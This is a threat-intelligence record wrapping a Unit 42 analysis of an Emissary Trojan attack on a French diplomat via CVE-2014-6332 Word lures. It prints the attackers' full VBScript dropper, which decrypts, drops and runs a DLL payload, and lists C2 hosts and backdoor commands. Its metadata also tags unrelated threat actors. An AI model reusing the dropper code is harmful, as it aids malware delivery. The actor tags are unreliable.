{
	"id": "27b2c64a-bc29-4a23-bd1b-1ceb87a35605",
	"created_at": "2026-04-06T00:15:51.943786Z",
	"updated_at": "2026-04-10T03:34:27.57544Z",
	"deleted_at": null,
	"sha1_hash": "8c24226faacc952e606ef9d3fdda0216f13b9f5b",
	"title": "Attack on French Diplomat Linked to Operation Lotus Blossom",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 509896,
	"plain_text": "Attack on French Diplomat Linked to Operation Lotus Blossom\r\nBy Robert Falcone, Jen Miller-Osborn\r\nPublished: 2015-12-18 · Archived: 2026-04-05 15:05:16 UTC\r\nWe observed a targeted attack in November directed at an individual working for the French Ministry of Foreign\r\nAffairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and\r\ncontained an invitation to a Science and Technology support group event.\r\nThe actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC)\r\ncode to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign. The TTPs\r\nused in this attack also match those detailed in the paper. The targeting of this individual suggests the actors are\r\ninterested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between\r\nFrance and Taiwan.\r\nWe have created the Emissary tag for AutoFocus users to track this threat.\r\nEn garde!\r\nOn November 10, 2015, threat actors sent a spear-phishing email to an individual at the French Ministry of\r\nForeign Affairs. The subject and the body of the email suggest the targeted individual had been invited to a\r\nScience and Technology conference in Hsinchu, Taiwan. The e-mail appears quite timely, as the conference was\r\nheld on November 13, 2015, which is three days after the attack took place.\r\nThe email body contained a link to the legitimate registration page for the conference, but the email also had two\r\nattachments with the following filenames that also pertain to the conference:\r\n1. 蔡英文柯建銘全國科技後援會邀請函.doc (translates to “Tsai Ker Chien-ming National Science and\r\nTechnology Support Association invitations.doc”)\r\n2. 
書面報名表格.doc (translates to “Written Application Form.doc”)\r\nBoth attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array\r\nRemote Code Execution Vulnerability tracked by CVE-2014-6332. Upon successful exploitation, the attachments\r\nwill install a Trojan named Emissary and open a Word document as a decoy.\r\nThe first attachment opens a decoy (Figure 2) that is a copy of an invitation to a Science and Technology\r\nconference this past November 13th held in Hsinchu, Taiwan, while the second opens a decoy (Figure 1) that is a\r\nregistration form to attend the conference. The conference was widely advertised online and on Facebook;\r\nhowever, in this case the invitation includes a detailed itinerary that does not seem to have appeared online. The\r\nDemocratic Progressive Party’s (DPP) Chairwoman Tsai Ing-wen and DPP caucus whip and Hsinchu\r\nrepresentative Ker Chien-ming were the primary political sponsors of the conference and are longtime political\r\nallies. Tsai Ing-wen is the current front-runner for the Taiwanese Presidency and Ker Chien-ming may become\r\nSpeaker if she wins. The conference focused on using open source technology, open international recruiting, and\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 1 of 16\n\npartnerships to continue developing Hsinchu as the Silicon Valley of Taiwan. It particularly noted France as an\r\nally in this, and France is Taiwan’s second largest technology partner and fourth largest trading partner in Europe.\r\nFigure 1 Decoy document containing written application form\r\nFigure 2 Decoy document containing the invitation and agenda for event\r\nExploiting CVE-2014-6332\r\nThe threat actors attempted to exploit CVE-2014-6332 using the POC code available in the wild. 
The POC code\r\ncontains inline comments that explain how the malicious VBScript exploits this vulnerability, so instead of\r\ndiscussing the malicious script or exploit itself, we will focus on the portions of the script that the threat actors\r\nmodified.\r\nThe actors removed the explanatory comments from the VBScript and made slight modifications to the POC code.\r\nThe only major functional difference between the POC and the VBScript involved adding the ability to extract and\r\nrun both a decoy document and a payload. Figures 3 and 4 compare the differing “runshell” function within the\r\nPOC and the malicious documents used in this attack. The code in Figure 3 shows that the POC does nothing\r\nmore than launch the notepad.exe application upon successful exploitation. Figure 4 shows the malicious\r\ndocument creating a file named “ss.vbs” and writing a VBScript into it using a series of “echo” statements. 
After\r\nwriting the VBScript, the malicious document executes the “ss.vbs” file.\r\nfunction runshell()\r\n  On Error Resume Next\r\n  set shell=createobject(\"Shell.Application\")\r\n  shell.ShellExecute \"notepad.exe\"\r\nend function\r\nFigure 3 Code block containing “runshell” function in CVE-2014-6332 proof-of-concept VBScript\r\nfunction runshell()\r\n  On Error Resume Next\r\n  set objshell= Createobject(\"WScript.Shell\")\r\n  strValue = objshell.RegRead(\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Local AppData\")\r\n  ename = \"rundll32\"\",\"\"\"\"\"\"\"\u0026strValue\u0026\"\\mm.dll\"\"\"\",Setting\"\r\n  outfile1= strValue\u0026\"\\mm.dll\"\r\n  bs = strValue\u0026\"\\ss.vbs\"\r\n  dn= strValue\u0026\"\\t.doc\"\r\n  v=window.location.href\r\n  v=Replace(v,\"file:///\",\"\",1,1,1)\r\n  v=Replace(v,\"?.html\",\"\",1,1,1)\r\n  v=Replace(v,\"%20\",\" \",1)\r\n  v=Replace(v,\"/\",\"\\\",1)\r\n  cmd = \"cmd\"\r\n  arg=\" /c taskkill  -f -im winword.exe \"\r\n  arg1= \"\"\",\"\"\"\r\n  set shell=createobject(\"wscript.shell\")\r\n  shell.run \"cmd.exe /c \"\"echo On Error Resume Next \u003e\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo set shell=createobject(\"\"Shell.Application\"\") \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"    \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"cmd\"\",\"\"\"\u0026arg\u0026\"\"\",\"\"\"\",\"\"\"\",0 \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"        \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo wscript.sleep 3000             \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  
shell.run \"cmd.exe /c \"\"echo dim str                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim L1                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim L2                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim Len                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim infile                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim outfile1                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim outfile2                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo infile = \"\"\"\u0026v\u0026\"\"\"                                                             \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo outfile1 = \"\"\"\u0026outfile1\u0026\"\"\"                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo outfile2 = \"\"\"\u0026dn\u0026\"\"\"                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 4 of 
16\n\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n  shell.run \"cmd.exe /c \"\"echo L1=     78924                                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo L2=     38912                                                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo size=    144893                                                                 \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo offset1 = size-L1-L2                                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo offset2 = size-L2                                                            \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Len=0                                                                        \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo str = ReadBinary (infile,L1,offset1)                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo WriteBinary outfile1, str                                                    \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo str = ReadBinary (infile,L2,offset2)                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo WriteBinary outfile2, str                                                    \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Function ReadBinary(FileName,length,offset)                   
               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Dim Buf(), I                                                               \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   With CreateObject(\"\"ADODB.Stream\"\")                                        \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position =\r\noffset \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     Len =length -1                                                           \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     ReDim Buf(Len)                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 5 of 16\n\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n  shell.run \"cmd.exe /c \"\"echo     For I = 0 To Len: if(I=0)  then Buf(I)=(AscB(.Read(1))) else if ((I mod\r\n2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor\r\nAscB(chr(67))) end if        \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     Next                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Close                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   End With                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   ReadBinary = Buf                                
                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End Function                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Sub WriteBinary(FileName, Buf)                                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Dim I, aBuf, Size, bStream                                                 \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Size = UBound(Buf): ReDim aBuf(Size \\ 2)                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   For I = 0 To Size - 1 Step 2                                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo       aBuf(I \\ 2) = ChrW(Buf(I + 1) * 256 + Buf(I))                          \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Next                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I))                                \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   aBuf=Join(aBuf, \"\"\"\")                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Set bStream = CreateObject(\"\"ADODB.Stream\"\")                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   bStream.Type = 1: bStream.Open                                             \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" 
\",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 6 of 16\n\nshell.run \"cmd.exe /c \"\"echo   With CreateObject(\"\"ADODB.Stream\"\")                                        \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Type = 2 : .Open: .WriteText aBuf                                       \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Position = 2: .CopyTo bStream: .Close                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   End With                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   bStream.SaveToFile FileName, 2: bStream.Close                              \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Set bStream = Nothing                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End Sub                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo set shell=createobject(\"\"Shell.Application\"\") \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"    \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"\"\u0026dn\u0026\"\"\" \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"               \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"\"\u0026ename\u0026\"\"\" \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"               \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Set xa = CreateObject(\"\"Scripting.FileSystemObject\"\")\r\n\u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo 
If xa.FileExists(\"\"\"\u0026bs\u0026\"\"\") Then                    \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Set xb = xa.GetFile(\"\"\"\u0026bs\u0026\"\"\")                      \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo xb.Delete                                             \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End If                                                \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"\"\u0026bs\u0026\"\"\"   \",0,true\r\nend function\r\nFigure 4 Code block containing \"runshell\" function in malicious VBScript within attachment\r\nThe ss.vbs file is responsible for locating the payload and decoy document within the initial malicious document, as\r\nwell as decrypting, saving and opening both of the files. The script has hardcoded offsets to the location of both\r\nthe payload and decoy document within the initial document. The script decrypts both of the embedded files\r\nusing a two-byte XOR loop that skips the first byte and then decrypts the remaining bytes using “A” and “C” as the key.\r\nAfter decrypting the embedded files, the script saves the decoy to “t.doc” and the payload to “mm.dll” in the\r\n“%APPDATA%\\LocalData” folder. 
Finally, the script will open the decoy document and launch the payload by\r\ncalling its exported function named “Setting”.\r\nOn Error Resume Next\r\nset shell=createobject(\"Shell.Application\")\r\nshell.ShellExecute \"cmd\",\" /c taskkill  -f -im winword.exe \",\"\",\"\",0\r\nwscript.sleep 3000\r\ndim str\r\ndim L1\r\ndim L2\r\ndim Len\r\ndim infile\r\ndim outfile1\r\ndim outfile2\r\ninfile = \"C:\\Documents and Settings\\\u003cusername\u003e\\Desktop\\\u003cmalicious document name\u003e.doc\"\r\noutfile1 = \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\mm.dll\"\r\noutfile2 = \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\t.doc\"\r\nL1=     78924\r\nL2=     38912\r\nsize=    144893\r\noffset1 = size-L1-L2\r\noffset2 = size-L2
\r\nLen=0\r\nstr = ReadBinary (infile,L1,offset1)\r\nWriteBinary outfile1, str\r\nstr = ReadBinary (infile,L2,offset2)\r\nWriteBinary outfile2, str\r\nFunction ReadBinary(FileName,length,offset)\r\n  Dim Buf(), I\r\n  With CreateObject(\"ADODB.Stream\")\r\n    .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset\r\n    Len =length -1\r\n    ReDim Buf(Len)\r\n    For I = 0 To Len: if(I=0)  then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if\r\n    Next\r\n    .Close\r\n  End With\r\n  ReadBinary = Buf\r\nEnd Function\r\nSub WriteBinary(FileName, Buf)\r\n  Dim I, aBuf, Size, bStream\r\n  Size = UBound(Buf): ReDim aBuf(Size \\ 2)
\r\n  For I = 0 To Size - 1 Step 2\r\n      aBuf(I \\ 2) = ChrW(Buf(I + 1) * 256 + Buf(I))\r\n  Next\r\n  If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I))\r\n  aBuf=Join(aBuf, \"\")\r\n  Set bStream = CreateObject(\"ADODB.Stream\")\r\n  bStream.Type = 1: bStream.Open\r\n  With CreateObject(\"ADODB.Stream\")\r\n    .Type = 2 : .Open: .WriteText aBuf\r\n    .Position = 2: .CopyTo bStream: .Close\r\n  End With\r\n  bStream.SaveToFile FileName, 2: bStream.Close\r\n  Set bStream = Nothing\r\nEnd Sub\r\nset shell=createobject(\"Shell.Application\")\r\nshell.ShellExecute \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\t.doc\"\r\nshell.ShellExecute \"rundll32\",\"\"\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\mm.dll\"\",Setting\"\r\nSet xa = CreateObject(\"Scripting.FileSystemObject\")\r\nIf xa.FileExists(\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\ss.vbs\") Then\r\nSet xb 
= xa.GetFile(\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\ss.vbs\")\r\nxb.Delete\r\nEnd If\r\nFigure 5 VBScript within ss.vbs responsible for extracting and running the payload and decoy\r\nEmissary 5.3 Analysis\r\nThe payload of this attack is a Trojan that we track with the name Emissary. This Trojan is related to the Elise\r\nbackdoor described in the Operation Lotus Blossom report. Both Emissary and Elise are part of a malware group\r\nreferred to as “LStudio”, a name based on the following debug strings found in Emissary and Elise samples:\r\nd:\\lstudio\\projects\\worldclient\\emissary\\Release\\emissary\\i386\\emissary.pdb\r\nd:\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb\r\nThere is code overlap between Emissary and Elise, specifically in the use of a common function to log debug\r\nmessages to a file and a custom algorithm to decrypt the configuration file. The custom algorithm used by\r\nEmissary and Elise to decrypt their configurations uses the “srand” function to set a seed value for the “rand”\r\nfunction, which the algorithm uses to generate a key. While the “rand” function is meant to generate random\r\nnumbers, the malware author uses the “srand” function to seed the “rand” function with a static value. The static\r\nseed value causes the “rand” function to produce the same values each time it is called and results in a static key to\r\ndecrypt the configuration. 
The seed value is where Emissary and Elise differ in their use of this algorithm, as\r\nEmissary uses a seed value of 1024 (as seen in Figure 6) and Elise uses a seed value of 2012.\r\nFigure 6 Custom algorithm in Emissary using 'srand' and 'rand' with 1024 as a seed value\r\nWhile these two Trojans share code, we consider Emissary and Elise separate tools since their configuration\r\nstructure, command handler and C2 communications channel differ. The Emissary Trojan delivered in this attack\r\ncontains the components listed in Table 1. At a high level, Emissary has an initial loader DLL that extracts a\r\nconfiguration file and a second DLL containing Emissary’s functional code, which it injects into Internet Explorer.\r\nMD5 Path Description\r\n06f1d2be5e981dee056c231d184db908 %APPDATA%\\LocalData\\ishelp.dll Loader\r\n6278fc8c7bf14514353797b229d562e8 %APPDATA%\\LocalData\\A08E81B411.DAT Emissary Payload\r\ne9f51a4e835929e513c3f30299567abc %APPDATA%\\LocalData\\75BD50EC.DAT Configuration file\r\nvaries %TEMP%\\000A758C8FEAE5F.TMP Log file\r\nTable 1 Dropped files associated with Emissary Trojan seen in attack on French Ministry of Foreign Affairs\r\nThe loader Trojan named “ishelp.dll” had an original name of “Loader.dll”; it extracts the Emissary\r\npayload from a resource named \"asdasdasdasdsad\" and writes it to a file named “A08E81B411.DAT”. The loader\r\nthen writes an embedded configuration to a file named “75BD50EC.DAT”. The loader Trojan creates a mutex\r\nnamed “_MICROSOFT_LOADER_MUTEX_” and finishes by injecting the Emissary DLL in\r\n“A08E81B411.DAT” into a newly spawned Internet Explorer process.\r\nThe Emissary Trojan runs within the Internet Explorer process. 
It begins by reading and decrypting its\r\nconfiguration file, which has the following structure:\r\nstruct emissary_config {\r\nWORD emissary_version_major;\r\nWORD emissary_version_minor;\r\nCHAR[36] GUID_for_sample;\r\nWORD Unknown1;\r\nCHAR[128] Server1;\r\nCHAR[128] Server2;\r\nCHAR[128] Server3;\r\nCHAR[128] CampaignName;\r\nCHAR[550] Unknown2;\r\nWORD Delay_interval_seconds;\r\n};\r\nWe decrypted and parsed the configuration file that accompanied the payload used in this attack, which resulted in\r\nthe following settings:\r\nVersion: 5.3\r\nGUID: ba87c1c5-f71c-4a8b-b511-07aa113d9103\r\nC2 Server 1: http://ustar5.PassAs[.]us/default.aspx\r\nC2 Server 2: http://203.124.14.229/default.aspx\r\nC2 Server 3: http://dnt5b.myfw[.]us/default.aspx\r\nCampaign Code: UPG-ZHG-01\r\nSleep Delay: 300\r\nAfter decrypting the configuration file, Emissary interacts with its command and control (C2) servers using HTTP\r\nor HTTPS, depending on the protocol specified in the configuration file. The initial network beacon sent from\r\nEmissary to its C2 server, seen in Figure 7, includes a Cookie field that contains “GUID”, “op” and “SHO” fields.\r\nThe GUID field is a unique identifier for the compromised system that is obtained directly from the configuration\r\nfile. The op field has a value of “101”, which is a static value that represents the initial network beacon. 
The SHO\r\nfield contains the external IP address of the infected system, which Emissary obtains from a legitimate website,\r\n“showip.net”, specifically by parsing the website’s response for ‘\u003cinput id=\"checkip\" type=\"text\" name=\"check_ip\" value=’, which is followed by the IP address of the system.\r\nFigure 7 Network beacon sent from Emissary Trojan to C2 server\r\nThe C2 server’s response to this beacon (seen in Figure 8) contains a header field called “Set-Cookie”, which\r\ncontains a value named “SID”. The SID value is base64 encoded and encrypted using a rolling XOR algorithm, and\r\nonce decoded and decrypted it contains a 36-character GUID value. The Emissary Trojan uses this GUID value\r\nprovided by the C2 server as the encryption key for data sent in subsequent network\r\ncommunications.\r\nFigure 8 C2 response to Emissary beacon\r\nThe C2 server provides commands to the Trojan as a three-digit numeric string within the data portion of the\r\nHTTP response (in the form of “op=\u003ccommand\u003e”), which the Emissary Trojan decrypts and compares to the list\r\nof commands within its command handler. The command handler function within the Emissary Trojan supports\r\nsix commands, as seen in Table 2.\r\nCommand Description\r\n102 Upload a file to the C2 server.\r\n103 Execute a specified command.\r\n104 Download a file from the C2 server.\r\n105 Update the configuration file.\r\n106 Create a remote shell.\r\n107 Update the Trojan with a new executable.\r\nTable 2 Command handler within Emissary version 5.3\r\nIf the command issued from the C2 server does not match one of the commands listed in Table 2, the Trojan saves the message\r\n\"unkown:%s\" to the log file. 
The command set available within Emissary gives the threat actors backdoor access\r\nto a compromised system. Using this access, the threat actors can exfiltrate data and carry out further activities on\r\nthe system, including interacting directly with the system’s command shell and downloading and executing\r\nadditional tools for further functionality.\r\nThreat Infrastructure\r\nThe infrastructure associated with the Emissary C2 servers used in this attack includes ustar5.PassAs[.]us,\r\n203.124.14.229 and dnt5b.myfw[.]us. The infrastructure is rather isolated, as the only overlap in domains involves\r\nappletree.onthenetas[.]com. The overlap, as seen in Figure 9, involves two IP addresses that during the same time\r\nframe resolved both the appletree.onthenetas[.]com domain and the Emissary C2 domain of ustar5.PassAs[.]us.\r\nThe other C2 domain used by this Emissary payload, specifically dnt5b.myfw[.]us, currently resolves to\r\n127.0.0.1. This provides another glimpse into the TTPs of these threat actors, as it suggests that they set\r\nsecondary C2 domains to resolve to the localhost IP address to avoid network detection and change them to a\r\nroutable IP address when they need the C2 server operational. Additionally, while this infrastructure does not\r\noverlap with that used in Operation Lotus Blossom, that also fits the TTPs. In each case, the threat actors\r\nused separate infrastructure for different targets, another way to help avoid detection.\r\nFigure 9 Infrastructure associated with Emissary Trojan\r\nConclusion\r\nAPT threat actors, most likely nation-state-sponsored, targeted a diplomat in the French Ministry of Foreign\r\nAffairs with a seemingly legitimate invitation to a technology conference in Taiwan. 
It is entirely possible the diplomat was truly invited to the conference, or at least would not have been surprised by the invitation, adding to the likelihood that the attachment would be opened. The actors were attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan, specifically version 5.3.\r\nThe Emissary Trojan is related to the Elise malware used in Operation Lotus Blossom, an attack campaign against targets in Southeast Asia that in many cases also used official-looking decoy documents that do not appear to have been available online. Additionally, the targeting of a French diplomat based in Taipei, Taiwan aligns with previous targeting by these actors, as does the use of separate infrastructure. Based on the targeting and lures, Unit 42 assesses that the threat actors’ collection requirements include not only militaries and government agencies in Southeast Asia but also nations involved in diplomatic and trade agreements with them.\r\nIndicators\r\nRelated Hashes (MD5)\r\n748feae269d561d80563eae551ef7bfd - 書面報名表格.doc\r\n9fd6f702763a9840bd1b3a898eb9c62d - 蔡英文柯建銘全國科技後援會邀請函.doc\r\n06f1d2be5e981dee056c231d184db908 - ishelp.dll\r\n6278fc8c7bf14514353797b229d562e8 - A08E81B411.DAT\r\ne9f51a4e835929e513c3f30299567abc - 75BD50EC.DAT\r\nCommand and Control\r\n203.124.14.229\r\nustar5.PassAs[.]us\r\nappletree.onthenetas[.]com\r\ndnt5b.myfw[.]us\r\nSource: https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/"
	],
	"report_names": [
		"attack-on-french-diplomat-linked-to-operation-lotus-blossom"
	],
	"threat_actors": [
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cfdd35af-bd12-4c03-8737-08fca638346d",
			"created_at": "2022-10-25T16:07:24.165595Z",
			"updated_at": "2026-04-10T02:00:04.887031Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Cosmic Wolf",
				"Marbled Dust",
				"Silicon",
				"Teal Kurma",
				"UNC1326"
			],
			"source_name": "ETDA:Sea Turtle",
			"tools": [
				"Drupalgeddon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
